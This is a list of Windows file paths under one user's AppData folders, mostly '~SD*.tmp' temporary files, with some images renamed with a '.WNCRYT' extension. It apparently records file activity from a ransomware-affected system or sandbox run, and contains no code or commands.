file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ha-latn-ng\~SDF377.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\he\~SDF3B6.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hi\~SDF3F6.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hr\~SDF407.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hu\~SDF446.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hy\~SDF495.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\id\~SDF4C5.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ig-ng\~SDF533.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\imageformats\~SDF5B1.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\~SDF63F.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\is\~SDF68E.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\it\~SDF6DD.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ja\~SDF70D.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ka\~SDF75C.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kk\~SDF79C.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\km-kh\~SDF7DB.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kn\~SDF82A.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ko\~SDF86A.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kok\~SDF8A9.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ku-arab\~SDF8D9.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ky\~SDF8FA.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lb-lu\~SDF939.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lt\~SDF979.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lv\~SDF9A8.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mi-nz\~SDF9D8.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mk\~SDFA37.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ml-in\~SDFA67.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mn\~SDFA97.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mr\~SDFAC7.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ms\~SDFAF7.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mt-mt\~SDFB26.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nb-no\~SDFB56.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ne-np\~SDFB86.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nl\~SDFBB6.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nn-no\~SDFBC7.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nso-za\~SDFBE7.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\or-in\~SDFC36.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa\~SDFC66.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa-arab\~SDFCB5.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa-arab-pk\~SDFCC6.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pl\~SDFCE6.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\platforms\~SDFCE7.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\prs-af\~SDFCE8.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pt-br\~SDFCE9.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pt-pt\~SDFD28.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\~SDFD68.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\~SDFD88.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\~SDFDE7.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\Styles\~SDFE36.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\Styles\Flat\~SDFE85.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls.2\~SDFEC5.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Extras\~SDFF14.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Layouts\~SDFF73.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Templates.2\~SD10.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Window.2\~SD30.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick.2\~SD50.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qut-latn\~SD9F.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\quz-pe\~SDCF.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ro\~SD10F.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ru\~SD11F.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\rw\~SD16F.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\scenegraph\~SD1CD.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sd-arab\~SD1FD.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sd-arab-pk\~SD23D.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\si-lk\~SD27C.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sk\~SD28D.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sl\~SD28E.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sq\~SD28F.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-cyrl-ba\~SD290.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-cyrl-rs\~SD291.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-latn-rs\~SD2FF.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sv\~SD36E.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sw\~SD3BD.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ta\~SD3FC.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\te\~SD47A.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tg\~SD49A.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tg-cyrl\~SD4CA.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\th\~SD558.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ti\~SD5C6.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tk-tm\~SD615.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tn-za\~SD645.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tr\~SD6A4.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tt\~SD6F3.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ug\~SD713.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ug-arab\~SD743.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\uk\~SD764.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ur\~SD7A3.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\uz-latn-uz\~SD7E3.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\vi\~SD7F3.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\wo\~SD813.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\xh-za\~SD814.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\yo-ng\~SD854.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zh-cn\~SD874.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zh-tw\~SD885.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zu-za\~SD8A5.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\~SD8B6.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\~SD914.tmp
file: C:\Users\user\AppData\Local\Microsoft\PlayReady\~SD944.tmp
file: C:\Users\user\AppData\Local\Microsoft\RMSLocalStorage\~SD974.tmp
file: C:\Users\user\AppData\Local\Microsoft\TaskSchedulerConfig\~SD994.tmp
file: C:\Users\user\AppData\Local\Microsoft\Vault\~SD9C4.tmp
file: C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\~SD9C5.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\~SD9C6.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\1024\~SD9C7.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\1033\~SD9C8.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\~SD9C9.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\7AI636VW\~SD9CA.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\Burn\~SD9DB.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\Burn\Burn\~SD9DC.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\~SD9DD.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\~SD9DE.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\GameExplorer\~SD9DF.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\History\~SD9E0.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\~SD9E1.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024080520240806\~SD9F2.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\History\Low\~SD9F3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\~SD9F4.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ISE\~SD9F5.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ISE\S-1-5-5-0-122291\~SD9F6.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\~SD9F7.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\~SD9F8.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\~SDA18.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Themes\~SDA77.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\~SDA87.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\WER\~SDAC7.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\~SDAF7.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\~SDB26.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\~SDB37.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_3eb5ea8473594499407cacbd9887e2953d50fd80_cab_0a5884df\~SDB57.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_5f6630b0297fd4d8402560a938657f1364116_cab_012098e4\~SDB68.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_7e7688eac2ab845272f4daac96479e93e0f0a5_cab_0ad8a2e7\~SDB88.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_d0c641ef89a8d207056286596bafe75f59844_cab_0a108ee2\~SDBB8.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows Live\~SDBD8.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\~SDBD9.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\~SDBEA.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\~SDBEB.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new\~SDC3A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\~SDC7A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Media\~SDEFB.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\~SDEFC.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\~SDF6B.tmp
file: C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\Gadgets\~SDF7B.tmp
file: C:\Users\user\AppData\Local\Microsoft_Corporation\~SDF9B.tmp
file: C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\~SDFCB.tmp
file: C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\~SDFFB.tmp
file: C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveFiles\~SD102B.tmp
file: C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\~SD106B.tmp
file: C:\Users\user\AppData\Local\Mozilla\~SD108B.tmp
file: C:\Users\user\AppData\Local\Mozilla\Firefox\~SD10DA.tmp
file: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\~SD10DB.tmp
file: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\~SD10DC.tmp
file: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\~SD10ED.tmp
file: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\doomed\~SD114B.tmp
file: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\entries\~SD117B.tmp
file: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\safebrowsing\~SD11DA.tmp
file: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\safebrowsing\google4\~SD1239.tmp
file: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\startupCache\~SD123A.tmp
file: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\thumbnails\~SD1279.tmp
file: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\yivbg7nf.default\~SD1299.tmp
file: C:\Users\user\AppData\Local\Package Cache\~SD12BA.tmp
file: C:\Users\user\AppData\Local\Package Cache\{85379532-0003-4517-8fc4-6227b410c30c}\~SD12EA.tmp
file: C:\Users\user\AppData\Local\pip\~SD130A.tmp
file: C:\Users\user\AppData\Local\pip\cache\~SD1359.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\~SD136A.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\4\~SD1399.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\4\e\~SD13D9.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\4\e\e\~SD1428.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\4\e\e\3\~SD1448.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\4\e\e\3\1\~SD14A7.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\8\~SD14D7.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\8\8\~SD14F7.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\8\8\6\~SD1517.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\8\8\6\e\~SD1528.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\8\8\6\e\e\~SD1539.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\a\~SD1578.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\a\1\~SD1598.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\a\1\9\~SD15B9.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\a\1\9\5\~SD15C9.tmp
file: C:\Users\user\AppData\Local\pip\cache\http\a\1\9\5\3\~SD15EA.tmp
file: C:\Users\user\AppData\Local\pip\cache\selfcheck\~SD160A.tmp
file: C:\Users\user\AppData\LocalLow\~SD163A.tmp
file: C:\Users\user\AppData\LocalLow\Adobe\~SD165A.tmp
file: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\~SD1699.tmp
file: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\~SD16F8.tmp
file: C:\Users\user\AppData\LocalLow\Adobe\Linguistics\~SD1747.tmp
file: C:\Users\user\AppData\LocalLow\Microsoft\~SD17A6.tmp
file: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\~SD17E6.tmp
file: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\~SD1883.tmp
file: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\~SD1910.tmp
file: C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\~SD19BD.tmp
file: C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\~SD19DE.tmp
file: C:\Users\user\AppData\LocalLow\Microsoft\RMSLocalStorage\~SD1A0D.tmp
file: C:\Users\user\AppData\LocalLow\Mozilla\~SD1A2E.tmp
file: C:\Users\user\AppData\LocalLow\Sun\~SD1A7D.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\~SD1A9D.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\~SD1ABD.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\~SD1AED.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\~SD1B6B.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\0\~SD1BBA.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\1\~SD1BDB.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\10\~SD1C39.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\11\~SD1C79.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12\~SD1CD8.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13\~SD1CF8.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14\~SD1D37.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\15\~SD1D67.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\16\~SD1DB6.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\17\~SD1DE6.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\18\~SD1DF7.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19\~SD1E17.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\2\~SD1E37.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20\~SD1E67.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\21\~SD1E87.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\22\~SD1ED7.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23\~SD1EE7.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\24\~SD1F07.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\25\~SD1F28.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\26\~SD1F77.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27\~SD1FA7.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\28\~SD1FE6.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\29\~SD2035.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\3\~SD2065.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30\~SD2095.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31\~SD20B5.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\32\~SD20E5.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33\~SD2144.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\34\~SD2155.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35\~SD2175.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36\~SD21B4.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\37\~SD21E4.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\38\~SD21F5.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\39\~SD2234.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4\~SD2264.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\40\~SD2284.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\41\~SD2295.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\42\~SD2296.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43\~SD22E5.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\44\~SD22F6.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45\~SD2316.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\46\~SD2356.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47\~SD2376.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\48\~SD2396.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\49\~SD23C6.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\5\~SD2425.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50\~SD2435.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\51\~SD2456.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\52\~SD24C4.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53\~SD24C5.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\54\~SD24C6.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\55\~SD2505.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\56\~SD2535.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57\~SD2556.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58\~SD2566.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\59\~SD2577.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\6\~SD2587.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\60\~SD25A8.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\61\~SD25C8.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\62\~SD25F8.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63\~SD2618.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7\~SD2629.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\8\~SD262A.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\9\~SD262B.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host\~SD262C.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin\~SD262D.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\log\~SD262E.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\security\~SD263E.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\tmp\~SD263F.tmp
file: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\tmp\si\~SD2640.tmp
file: C:\Users\user\AppData\Roaming\~SD2641.tmp
file: C:\Users\user\AppData\Roaming\Adobe\~SD2652.tmp
file: C:\Users\user\AppData\Roaming\Adobe\Acrobat\~SD2653.tmp
file: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\~SD2654.tmp
file: C:\Users\user\AppData\Roaming\Adobe\Flash Player\~SD2655.tmp
file: C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\~SD2656.tmp
file: C:\Users\user\AppData\Roaming\Adobe\Headlights\~SD2657.tmp
file: C:\Users\user\AppData\Roaming\Adobe\Linguistics\~SD2658.tmp
file: C:\Users\user\AppData\Roaming\Adobe\LogTransport2\~SD2678.tmp
file: C:\Users\user\AppData\Roaming\com.adobe.dunamis\~SD2698.tmp
file: C:\Users\user\AppData\Roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\~SD26E8.tmp
file: C:\Users\user\AppData\Roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\~SD2746.tmp
file: C:\Users\user\AppData\Roaming\Identities\~SD27A5.tmp
